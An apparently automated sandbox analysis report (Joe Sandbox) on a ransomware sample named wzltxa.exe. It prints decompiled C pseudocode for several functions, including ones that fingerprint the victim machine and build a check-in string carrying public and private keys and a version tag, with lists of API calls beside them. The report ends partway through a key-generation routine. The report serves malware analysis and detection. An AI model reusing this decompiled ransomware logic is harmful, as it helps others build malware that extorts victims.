0x00000000
0x0fbb4f8e
0x0fbb4f8e
0x00000000
0x0fbb4f8a
0x0fbb4f8c
0x00000000
0x00000000
0x0fbb4f95
0x0fbb4fa4
0x00000000
0x0fbb4fa4
0x0fbb4f80
0x0fbb4f24
0x0fbb4f24
0x0fbb4f28
0x0fbb4f2f
0x0fbb4f31
0x0fbb4f31
0x0fbb4f36
0x0fbb4f4f
0x0fbb4f52
0x00000000
0x00000000
0x00000000
0x00000000
0x0fbb4f38
0x0fbb4f38
0x0fbb4f38
0x0fbb4f3c
0x00000000
0x00000000
0x0fbb4f45
0x0fbb4f47
0x00000000
0x0fbb4f49
0x0fbb4f49
0x0fbb4f4d
0x00000000
0x00000000
0x00000000
0x00000000
0x0fbb4f4d
0x00000000
0x0fbb4f47
0x00000000
0x0fbb4f38
0x00000000
0x0fbb4f54
0x0fbb4f54
0x0fbb4f57
0x0fbb4f58
0x0fbb4f59
0x0fbb4f5d
0x00000000
0x0fbb4f28
0x0fbb4f22
0x0fbb4ecb
0x0fbb4ecb
0x0fbb4ecf
0x0fbb4f05
0x0fbb4f19
0x0fbb4ed1
0x0fbb4ed3
0x0fbb4ed5
0x0fbb4ed5
0x0fbb4ed9
0x0fbb4ef7
0x0fbb4efa
0x00000000
0x00000000
0x00000000
0x00000000
0x0fbb4edb
0x0fbb4ee0
0x0fbb4ee0
0x0fbb4ee4
0x00000000
0x00000000
0x0fbb4eed
0x0fbb4eef
0x00000000
0x0fbb4ef1
0x0fbb4ef1
0x0fbb4ef5
0x00000000
0x00000000
0x00000000
0x00000000
0x0fbb4ef5
0x00000000
0x0fbb4eef
0x00000000
0x0fbb4ee0
0x00000000
0x0fbb4efc
0x0fbb4efc
0x0fbb4eff
0x0fbb4f00
0x0fbb4f01
0x00000000
0x0fbb4ed5
0x0fbb4ecf
0x00000000

APIs

lstrcpyA.KERNEL32(?,fabian wosar <3,?,0FBB51ED), ref: 0FBB4F0D
lstrlenA.KERNEL32(00000000,?,0FBB51ED), ref: 0FBB4F67
lstrcpyA.KERNEL32(?,?,?,0FBB51ED), ref: 0FBB4F98

Strings

fabian wosar <3, xrefs: 0FBB4F05

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: fabian wosar <3
API String ID: 367037083-1724090804
Opcode ID: b6c75d01057a5f9e9695e4c65d9482ce97462a60a8d0ad1c44089c837695ae87
Instruction ID: ac625807feb06de1cae0160564d3b329321be999bdb82a21801160ecf1fa8b7e
Opcode Fuzzy Hash: b6c75d01057a5f9e9695e4c65d9482ce97462a60a8d0ad1c44089c837695ae87
Instruction Fuzzy Hash: DD31F0218081A5DADB26CE7878103FABFA6FF43103B9851DDD8D99B207D6E16446CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB3190 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 42
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBB3190(CHAR* _a4) {
				char _t6;
				CHAR* _t13;
				CHAR* _t16;

				_t13 = _a4;
				_t16 = _t13;
				if( *_t13 == 0) {
					L5:
					lstrcmpiA(_t13, "mask");
					_t10 =  ==  ? 1 : 0;
					lstrcmpiA(_a4, "pub_key");
					 *_t16 = 0x3d;
					_t11 =  ==  ? 2 :  ==  ? 1 : 0;
					_t5 =  ==  ? 2 :  ==  ? 1 : 0;
					return  ==  ? 2 :  ==  ? 1 : 0;
				} else {
					while(1) {
						_t6 =  *_t16;
						if(_t6 == 0x7d) {
							break;
						}
						if(_t6 == 0x3d) {
							 *_t16 = 0;
							goto L5;
						} else {
							_t16 =  &(_t16[1]);
							if( *_t16 != 0) {
								continue;
							} else {
								goto L5;
							}
						}
						goto L8;
					}
					return 0;
				}
				L8:
			}

0x0fbb3193
0x0fbb3197
0x0fbb319c
0x0fbb31b0
0x0fbb31b9
0x0fbb31ce
0x0fbb31d1
0x0fbb31d9
0x0fbb31e1
0x0fbb31e4
0x0fbb31e9
0x0fbb31a0
0x0fbb31a0
0x0fbb31a0
0x0fbb31a4
0x00000000
0x00000000
0x0fbb31a8
0x0fbb31ec
0x00000000
0x0fbb31aa
0x0fbb31aa
0x0fbb31ae
0x00000000
0x00000000
0x00000000
0x00000000
0x0fbb31ae
0x00000000
0x0fbb31a8
0x0fbb31f5
0x0fbb31f5
0x00000000

APIs

lstrcmpiA.KERNEL32(0FBB5444,mask,0FBB5445,?,?,0FBB3441,0FBB5445,00000000,00000000,00000000,?,?,0FBB5444,00000000), ref: 0FBB31B9
lstrcmpiA.KERNEL32(0FBB5444,pub_key,?,0FBB3441,0FBB5445,00000000,00000000,00000000,?,?,0FBB5444,00000000), ref: 0FBB31D1

Strings

mask, xrefs: 0FBB31B1
pub_key, xrefs: 0FBB31BF

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: mask$pub_key
API String ID: 1586166983-1355590148
Opcode ID: d5f7da704fd501c6fc1b95edf96a1195f82c8e867d7cb0375121e721e8b2a087
Instruction ID: 7a20cc59a8a578519bb4d5306848b4df3a8c9cd7d956540fb61ecd3742abd83f
Opcode Fuzzy Hash: d5f7da704fd501c6fc1b95edf96a1195f82c8e867d7cb0375121e721e8b2a087
Instruction Fuzzy Hash: 31F046723082841EE7194AACBC857F1BBCCDB05310F8800BFFA89C2152D2FA9882CB50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: wzltxa.exePID: 1920, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	20.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	719
Total number of Limit Nodes:	12

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0FBB5860 Relevance: 109.0, APIs: 55, Strings: 7, Instructions: 458
stringmemoryencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E0FBB5860(CHAR* __ecx, int __edx, BYTE* _a4, signed int _a8, long* _a12) {
				char _v148;
				char _v152;
				void* _v156;
				int _v160;
				int _v164;
				CHAR* _v172;
				int _v176;
				CHAR* _v184;
				int _v192;
				void* _v196;
				CHAR* _v200;
				CHAR* _v204;
				WCHAR* _v208;
				void* _v212;
				void* _v216;
				signed int _v220;
				short* _v224;
				void* _v228;
				void* _v232;
				void* _v236;
				CHAR* _v240;
				CHAR* _v268;
				void* __esi;
				CHAR* _t134;
				void* _t136;
				int _t146;
				void* _t149;
				int _t150;
				signed int _t151;
				void* _t153;
				int _t159;
				signed int _t167;
				signed int _t171;
				CHAR* _t178;
				int _t179;
				CHAR* _t182;
				void* _t191;
				long _t195;
				void _t210;
				int _t211;
				intOrPtr _t215;
				int _t216;
				char _t217;
				long _t226;
				int _t239;
				char* _t240;
				void* _t244;
				void* _t245;
				void* _t248;
				long _t250;
				signed int _t254;
				CHAR* _t256;
				int _t259;
				int _t260;
				void* _t261;
				void* _t266;
				CHAR* _t267;
				void* _t270;
				CHAR* _t273;
				long _t276;
				CHAR* _t277;
				char* _t279;
				signed int _t282;
				int _t283;
				long _t286;
				void* _t287;
				void* _t288;
				WCHAR* _t289;
				WCHAR* _t290;
				void* _t291;
				WCHAR* _t292;
				WCHAR* _t294;
				int _t297;
				long _t298;
				void* _t299;
				CHAR* _t300;
				int _t302;
				signed int _t303;
				void* _t307;

				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_v184 = __ecx;
				_v160 = __edx;
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_t307 = (_t303 & 0xfffffff8) - 0x9c;
				_push(1);
				_push(__ecx);
				_push(1);
				E0FBB3BC0( &_v148);
				E0FBB7490( &_v236, __edx); // executed
				_t266 = E0FBB72A0( &_v236);
				_t282 = _a8 + __edx;
				_t7 = _t282 + 8; // 0x8
				_t226 = _t266 + _t7 * 8 << 3;
				_t134 = VirtualAlloc(0, _t226, 0x3000, 0x40); // executed
				_t259 = 0;
				_v240 = _t134;
				_v268 = _t134;
				_t239 = 0x30 + (_t266 + _t282 * 4) * 8;
				if(_t134 == 0 || _t239 >= _t226) {
					_v176 = _t259;
					_t267 = _t134;
				} else {
					_t267 = _t239 + _t134;
					_v176 = _t134;
					_v184 = _t267;
					_t259 = _t239;
				}
				_t136 = 2 + _a8 * 8;
				if(_v156 == 0) {
					L7:
					_t240 = 0;
					_v172 = 0;
				} else {
					_t302 = _t259 + _t136;
					if(_t302 >= _t226) {
						goto L7;
					} else {
						_t240 = _t267;
						_v172 = _t267;
						_t267 =  &(_t267[_t136]);
						_t259 = _t302;
						_v184 = _t267;
					}
				}
				_t283 = _v164;
				if(_v156 == 0 || 2 + _t283 * 8 + _t259 >= _t226) {
					_t267 = 0;
					_v184 = 0;
				}
				if(_t240 == 0) {
					L58:
					VirtualFree(_v156, 0, 0x8000);
					E0FBB7D70( &_v152);
					return 1;
				} else {
					_t260 = _a8;
					_v160 = _t260 + _t260;
					CryptBinaryToStringA(_a4, _t260, 0x40000001, _t240,  &_v160);
					_v176 = _t283 + _t283;
					CryptBinaryToStringA(_v204, _t283, 0x40000001, _t267,  &_v176);
					_t146 = lstrlenA(_t267);
					_t286 = _t146 + lstrlenA(_v204) + 0x42;
					_t149 = VirtualAlloc(0, _t286, 0x3000, 0x40); // executed
					_v196 = _t149;
					_v200 = _t149;
					_v220 = 0;
					_t150 = lstrlenA(_v204);
					_t261 = _v196;
					_t151 = _t150 + 1;
					if(_t261 == 0 || _t151 >= _t286) {
						_v212 = 0;
					} else {
						_v220 = _t151;
						_v200 = _t261 + _t151;
						_v212 = _t261;
					}
					_t153 = lstrlenA(_t267) + 1;
					if(_v196 == 0 || _t153 + _v220 >= _t286) {
						_v200 = 0;
					}
					_t287 = 0;
					if(lstrlenA(_v204) != 0) {
						_t279 = _v212;
						do {
							_t256 = _v204;
							_t217 =  *((intOrPtr*)(_t287 + _t256));
							if(_t217 != 0xa && _t217 != 0xd) {
								 *_t279 = _t217;
								_t279 = _t279 + 1;
							}
							_t287 = _t287 + 1;
						} while (_t287 < lstrlenA(_t256));
						_t267 = _v216;
					}
					_t288 = 0;
					if(lstrlenA(_t267) != 0) {
						_t254 = _v200;
						_v220 = _t254;
						do {
							_t215 =  *((intOrPtr*)(_t288 + _t267));
							if(_t215 != 0xa && _t215 != 0xd) {
								 *_t254 = _t215;
								_v220 = _t254 + 1;
							}
							_t288 = _t288 + 1;
							_t216 = lstrlenA(_t267);
							_t254 = _v220;
						} while (_t288 < _t216);
					}
					_t289 = _v208;
					lstrcatW(_t289, L"action=call&");
					_t290 =  &(_t289[lstrlenW(_t289)]);
					_v216 = _t290;
					E0FBB70A0( &_v184, _t290); // executed
					_v224 = 0;
					_v208 = 0;
					_t159 = E0FBB35C0( &_v224,  &_v208); // executed
					if(_t159 == 0) {
						ExitProcess(_t159); // executed
					}
					lstrcatW(_t290, L"&id=");
					_t270 = _v220;
					lstrcatW(_t290, _t270);
					lstrcatW(_t290, L"&subid=");
					_t291 = _v204;
					lstrcatW(_v216, _t291);
					VirtualFree(_t270, 0, 0x8000);
					VirtualFree(_t291, 0, 0x8000);
					_t292 = _v216;
					lstrcatW(_t292, L"&pub_key=");
					_t167 = lstrlenW(_t292);
					MultiByteToWideChar(0xfde9, 0, _v212, 0xffffffff,  &(_t292[_t167]), lstrlenA(_v212));
					_t294 = _v216;
					lstrcatW(_t294, L"&priv_key=");
					_t171 = lstrlenW(_t294);
					_t273 = _v200;
					MultiByteToWideChar(0xfde9, 0, _t273, 0xffffffff,  &(_t294[_t171]), lstrlenA(_t273));
					lstrcatW(_v216, L"&version=2.3.1r");
					_t276 = (lstrlenW(_v208) << 4) + 0x12;
					_v216 = VirtualAlloc(0, _t276, 0x3000, 0x40);
					_t244 = 2 + lstrlenW(_v208) * 8;
					_t178 = _v216;
					if(_t178 == 0 || _t244 >= _t276) {
						_t277 = 0;
					} else {
						_t277 = _t178;
					}
					_t179 = lstrlenW(_v208);
					_t245 =  *0xfbc2a78; // 0x0
					_v220 = _t179;
					if(_t245 != 0) {
						VirtualFree(_t245, 0, 0x8000);
					}
					_t182 = VirtualAlloc(0, lstrlenW(L"popkadurak") + 2, 0x3000, 4);
					 *0xfbc2a78 = _t182;
					if(_t182 != 0) {
						wsprintfA(_t182, "%S", L"popkadurak");
						_t307 = _t307 + 0xc;
					}
					_t297 = _v220 + _v220;
					E0FBB5F00(_v208, _t297, _t297);
					_v192 = _v220 * 8;
					if(CryptBinaryToStringA(_v208, _t297, 0x40000001, _t277,  &_v192) == 0) {
						GetLastError();
					}
					_t104 = lstrlenA(_t277) + 2; // 0x2
					_t298 = _t104;
					_v228 = VirtualAlloc(0, _t298, 0x3000, 0x40);
					_t106 = lstrlenA(_t277) + 1; // 0x1
					_t248 = _t106;
					_t191 = _v228;
					if(_t191 == 0) {
						L46:
						_v216 = 0;
					} else {
						_v216 = _t191;
						if(_t248 >= _t298) {
							goto L46;
						}
					}
					_t299 = 0;
					if(lstrlenA(_t277) != 0) {
						_v236 = _v216;
						do {
							_t210 =  *((intOrPtr*)(_t299 + _t277));
							if(_t210 != 0xa && _t210 != 0xd) {
								 *_t248 = _t210;
								_v236 = _t248 + 1;
							}
							_t299 = _t299 + 1;
							_t211 = lstrlenA(_t277);
							_t248 = _v236;
						} while (_t299 < _t211);
					}
					_t300 = _v216;
					MultiByteToWideChar(0xfde9, 0, _t300, 0xffffffff, _v224, lstrlenA(_t300));
					_v236 = 0;
					_t195 = E0FBB54F0(_t300,  &_v236, _t248, 1);
					if(_t195 != 0) {
						_t250 = _v236;
						if(_t250 != 0) {
							 *_a12 = _t250;
						}
						VirtualFree(_v228, 0, 0x8000);
						VirtualFree(_v232, 0, 0x8000);
						VirtualFree(_v212, 0, 0x8000);
						goto L58;
					} else {
						VirtualFree(_v228, _t195, 0x8000);
						VirtualFree(_v232, 0, 0x8000);
						VirtualFree(_v212, 0, 0x8000);
						VirtualFree(_v204, 0, 0x8000);
						E0FBB7D70( &_v200);
						return 0;
					}
				}
			}

APIs

Part of subcall function 0FBB3BC0: GetProcessHeap.KERNEL32(?,?,0FBB4807,00000000,?,00000000,00000000), ref: 0FBB3C5C

Part of subcall function 0FBB7490: VirtualAlloc.KERNELBASE(00000000,00000202,00003000,00000004), ref: 0FBB74B7
Part of subcall function 0FBB7490: GetUserNameW.ADVAPI32(00000000,?), ref: 0FBB74C8
Part of subcall function 0FBB7490: VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000004), ref: 0FBB74E6
Part of subcall function 0FBB7490: GetComputerNameW.KERNEL32 ref: 0FBB74F0
Part of subcall function 0FBB7490: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0FBB7510
Part of subcall function 0FBB7490: wsprintfW.USER32 ref: 0FBB7551
Part of subcall function 0FBB7490: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0FBB756E
Part of subcall function 0FBB7490: RegOpenKeyExW.KERNELBASE(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FBB7592
Part of subcall function 0FBB7490: RegQueryValueExW.KERNELBASE(00000000,LocaleName,00000000,00000000,0FBB4810,?), ref: 0FBB75B6
Part of subcall function 0FBB7490: RegCloseKey.KERNELBASE(00000000), ref: 0FBB75D2

Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB72F2
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB72FD
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7313
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB731E
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7334
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB733F
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7355
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(0FBB4B36,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7360
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7376
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7381
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7397
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB73A2
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB73C1
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB73CC

VirtualAlloc.KERNELBASE(00000000,00000008,00003000,00000040,00000001,00000000,00000001,00000001,00000000,00000001), ref: 0FBB58D0
CryptBinaryToStringA.CRYPT32(00000000,00000000,40000001,00000000,?), ref: 0FBB5980
CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0FBB5999
lstrlenA.KERNEL32(00000000), ref: 0FBB59A2
lstrlenA.KERNEL32(?), ref: 0FBB59AA
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 0FBB59BB
lstrlenA.KERNEL32(?), ref: 0FBB59D5
lstrlenA.KERNEL32(00000000), ref: 0FBB59FE
lstrlenA.KERNEL32(?), ref: 0FBB5A1E

Strings

action=call&, xrefs: 0FBB5A88
&pub_key=, xrefs: 0FBB5B1D
popkadurak, xrefs: 0FBB5BFE, 0FBB5C1A
&priv_key=, xrefs: 0FBB5B54
&id=, xrefs: 0FBB5AD0
&subid=, xrefs: 0FBB5AE4
&version=2.3.1r, xrefs: 0FBB5B7F

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocVirtual$BinaryCryptNameString$CloseComputerHeapOpenProcessQueryUserValuewsprintf
String ID: &id=$&priv_key=$&pub_key=$&subid=$&version=2.3.1r$action=call&$popkadurak
API String ID: 1618292170-4215222798
Opcode ID: 2ec421dccc6c7324da8cd0c2cb742d3e51c574ddf8c2471919aff3f25893c9d1
Instruction ID: d844ee7975951089f6a574294b886051ca4264f036a0260fc46416c2d67805ba
Opcode Fuzzy Hash: 2ec421dccc6c7324da8cd0c2cb742d3e51c574ddf8c2471919aff3f25893c9d1
Instruction Fuzzy Hash: 92F1AD71608301AFD720DF25EC85BABBBA9EF88710F44091CF585A7291DBB4E9058F66

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB4B20 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 182
threadsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				void* _v8;
				void* _v12;
				CHAR* _v16;
				int _v20;
				void* _v24;
				int _v28;
				void* _v32;
				int _v36;
				int _v40;
				int _v44;
				int _v48;
				int _v52;
				int _v60;
				char _v80;
				void* _t54;
				void* _t55;
				int _t79;
				void* _t81;
				short* _t97;
				void* _t114;

				Sleep(0x3e8); // executed
				_t54 = E0FBB47D0(_t90, _t106); // executed
				if(_t54 == 0) {
					_t55 = CreateThread(0, 0, E0FBB2D30, 0, 0, 0); // executed
					_v8 = _t55;
					if(_v8 != 0) {
						if(WaitForSingleObject(_v8, 0x1388) == 0x102) {
							_t90 = _v8;
							TerminateThread(_v8, 0);
						}
						_t106 = _v8;
						CloseHandle(_v8); // executed
					}
					E0FBB48C0(); // executed
					E0FBB42B0(_t90, _t106); // executed
					E0FBB6550( &_v80); // executed
					_v40 = 0;
					_v36 = 0;
					_v28 = 0;
					_v44 = 0;
					E0FBB6500( &_v80,  &_v28,  &_v44,  &_v40,  &_v36);
					_v48 = 0;
					_v16 = 0;
					if(E0FBB4B00(_v28) == 0) {
						while(_v48 == 0) {
							_t81 = E0FBB5860(_v28, _v44, _v40, _v36,  &_v16); // executed
							_t114 = _t114 + 0xc;
							if(_t81 != 0) {
								_v48 = 1;
							} else {
								Sleep(0x2710);
							}
						}
						E0FBB64C0( &_v80);
						_v32 = 0;
						_v20 = 0;
						_v52 = 0;
						_v60 = 0;
						__eflags = _v16;
						if(_v16 == 0) {
							L19:
							E0FBB4200();
							InitializeCriticalSection(0xfbc2a48);
							__eflags = _v52;
							if(__eflags == 0) {
								E0FBB3FF0( &_v80);
							} else {
								E0FBB41D0(_v32, _v20, __eflags);
							}
							DeleteCriticalSection(0xfbc2a48);
							__eflags = E0FBB3C70();
							if(__eflags != 0) {
								E0FBB45B0(__eflags);
							}
							_v24 = VirtualAlloc(0, 0x200, 0x3000, 4);
							__eflags = _v24;
							if(__eflags != 0) {
								GetModuleFileNameW(0, _v24, 0x100);
								E0FBB3DB0(_v24, _v24, __eflags);
								VirtualFree(_v24, 0, 0x8000);
							}
							__eflags =  *0xfbc2a44;
							if( *0xfbc2a44 != 0) {
								_t97 =  *0xfbc2a44; // 0x2c90000
								ShellExecuteW(0, L"open", _t97, 0, 0, 5);
							}
							ExitThread(0);
						}
						_v20 = lstrlenA(_v16);
						_v32 = VirtualAlloc(0, _v20, 0x3000, 4);
						_t79 = CryptStringToBinaryA(_v16, 0, 1, _v32,  &_v20, 0, 0);
						__eflags = _t79;
						if(_t79 != 0) {
							_v52 = 1;
							goto L19;
						}
						ExitProcess(0);
					} else {
						_v12 = VirtualAlloc(0, 0x200, 0x3000, 4);
						_t119 = _v12;
						if(_v12 != 0) {
							GetModuleFileNameW(0, _v12, 0x100);
							E0FBB3DB0(_v12,  &_v44, _t119);
							VirtualFree(_v12, 0, 0x8000);
						}
						ExitProcess(0);
					}
				}
				ExitProcess(0);
			}

APIs

Sleep.KERNELBASE(000003E8), ref: 0FBB4B2B

Part of subcall function 0FBB47D0: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB482C
Part of subcall function 0FBB47D0: lstrcpyW.KERNEL32 ref: 0FBB484F
Part of subcall function 0FBB47D0: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB4856
Part of subcall function 0FBB47D0: CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB486E
Part of subcall function 0FBB47D0: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB487A
Part of subcall function 0FBB47D0: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB4881
Part of subcall function 0FBB47D0: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB489B

ExitProcess.KERNEL32 ref: 0FBB4B3C
CreateThread.KERNELBASE ref: 0FBB4B51
WaitForSingleObject.KERNEL32(00000000,00001388), ref: 0FBB4B69
TerminateThread.KERNEL32(00000000,00000000), ref: 0FBB4B7C
CloseHandle.KERNEL32(00000000), ref: 0FBB4B86
VirtualAlloc.KERNEL32(00000000,00000200,00003000,00000004,00000000,00000000,00000000,00000000), ref: 0FBB4BFA
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0FBB4C14
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBB4C2D
ExitProcess.KERNEL32 ref: 0FBB4C35

Strings

open, xrefs: 0FBB4D90

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Virtual$AllocCreateErrorExitFreeLastProcessThread$CloseFileHandleModuleMutexNameObjectSingleSleepTerminateWaitlstrcpylstrlen
String ID: open
API String ID: 1803241880-2758837156
Opcode ID: cfaed11d6a0793b1a72b3c3462621a5ec17395bd63ac7dc31fb2c03516961217
Instruction ID: 1c22cc67a9ada22f5ce09b1687e559bf6716f38b3e2b36b5e6593ff178adbc73
Opcode Fuzzy Hash: cfaed11d6a0793b1a72b3c3462621a5ec17395bd63ac7dc31fb2c03516961217
Instruction Fuzzy Hash: A271EA70A40308EBEB14EFA5EC59BEE7B78BB04712F504058E601BA1C2DBF86945CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB82B0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 111
encryptionlibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E0FBB82B0(intOrPtr __ecx, void* __edx) {
				long* _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t37;
				void* _t40;
				struct HINSTANCE__* _t45;
				_Unknown_base(*)()* _t46;
				signed int _t54;
				long _t55;
				intOrPtr _t56;
				signed int _t58;
				signed int _t60;
				void* _t63;
				void* _t64;
				void* _t65;

				_t54 = 0;
				_v12 = __ecx;
				_t37 =  &_v8;
				_t63 = __edx;
				__imp__CryptAcquireContextW(_t37, 0, 0, 1, 0xf0000000); // executed
				if(_t37 == 0) {
					L15:
					return _t54;
				} else {
					_t58 = 0;
					do {
						_t3 = _t58 + 0x61; // 0x61
						 *((short*)(_t65 + _t58 * 2 - 0x64)) = _t3;
						_t58 = _t58 + 1;
					} while (_t58 < 0x1a);
					_t7 = _t63 + 1; // 0x1
					_t55 = _t7;
					_t40 = VirtualAlloc(0, _t55, 0x3000, 0x40); // executed
					_t64 = _t40;
					if(_t64 == 0 || _t63 >= _t55) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t45 = GetModuleHandleA( &_v32);
						if(_t45 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t46 = GetProcAddress(_t45, _t19);
							if(_t46 == 0) {
								goto L13;
							} else {
								_push(_t64);
								_push(_t63);
								_push(_v8);
								if( *_t46() == 0) {
									goto L13;
								} else {
									_t60 = 0;
									if(_t63 != 0) {
										_t56 = _v12;
										_v16 = 0x1a;
										do {
											asm("cdq");
											 *((short*)(_t56 + _t60 * 2)) =  *((intOrPtr*)(_t65 + ( *(_t64 + _t60) & 0x000000ff) % _v16 * 2 - 0x64));
											_t60 = _t60 + 1;
